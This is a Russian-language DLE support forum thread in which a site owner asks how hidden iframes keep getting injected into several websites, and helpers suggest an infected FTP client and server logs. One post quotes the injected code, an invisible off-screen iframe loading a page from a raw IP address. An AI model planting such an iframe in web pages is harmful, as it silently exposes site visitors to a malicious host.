Перейти к публикации

Рекомендованные сообщения

Несколько недельназад пролези фреймы на все сайты как дле так и на других движках, поубирал... сейчас снова сидят, что можно придумать? (Пароли менять не предлогаем) На дле вообще ужас прописываются и в mail index inc data файлов в 10-15...

Ссылка на сообщение
Поделиться на других сайтах
Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован.
Ссылка на сообщение
Поделиться на других сайтах

Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован.

один из сайтов endem.ru

Ссылка на сообщение
Поделиться на других сайтах

Не нашел я iframe на этом сайте

Ссылка на сообщение
Поделиться на других сайтах

Не нашел я iframe на этом сайте

да тут я уже убрал и ещё на 3-х вот только как понять гже дыра чтобы больше не пришлось....

Ссылка на сообщение
Поделиться на других сайтах

Дырка может быть где угодно. Например, заражен Ваш FTP клиент. Когда Вы заходите на сервер по протоколу FTP, то он начинает вносить изменения в файлы типа index.html и index.php и так далее.

Смотрите логи сервера. Или кто-то мог получить доступ к Вашему серверу через старые уязвимости, которые у Вас могли быть, и до сих пор пользуется.

Какая у Вас версия DLE?

Ссылка на сообщение
Поделиться на других сайтах

Дырка может быть где угодно. Например, заражен Ваш FTP клиент. Когда Вы заходите на сервер по протоколу FTP, то он начинает вносить изменения в файлы типа index.html и index.php и так далее.

Смотрите логи сервера. Или кто-то мог получить доступ к Вашему серверу через старые уязвимости, которые у Вас могли быть, и до сих пор пользуется.

Какая у Вас версия DLE?

Думаю вы правы так как не только сайты на DLE были поражены, а вы не могли бы подсказать где эти логи найти можно? Версия 9.2 разумеется.

Вот вид фрейма кстати <iframe width="468" height="60" src="нттп://195.14.112.168/124.php" style="top:0px; position:relative; border:0px; right:-550px; opacity:0; -moz-opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0)"></iframe>

Изменено пользователем sunca
Ссылка на сообщение
Поделиться на других сайтах

/var/log

Смотря, конечно, как у Вас всё настроено :)

Ссылка на сообщение
Поделиться на других сайтах

/var/log

Смотря, конечно, как у Вас всё настроено :)

думаю в никс врядли смогли бы пролезть. я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу...

Ссылка на сообщение
Поделиться на других сайтах

я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу...
Правильно думали. Проверьте компьютер на вирусы.

А логи на сервере тоже надо смотреть. Вдруг сможете понять человек это делает или какой-то скрипт

Изменено пользователем WWW.ZEOS.IN
Ссылка на сообщение
Поделиться на других сайтах

я думал вы имеете в виду что "winдовый" filezilla клиент содержит уязвимость при подключению к серверу...
Правильно думали. Проверьте компьютер на вирусы.

А логи на сервере тоже надо смотреть. Вдруг сможете понять человек это делает или какой-то скрипт

звучит это все же как найти иголку в стоге... Очень уверен что антивирус тут врядли может чем помочь, ведь вредоносного когда никакого и нет по сути как для антивирусной коалиции...

Было бы не плохо увидеть реально возможные закаулки для этого кода.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...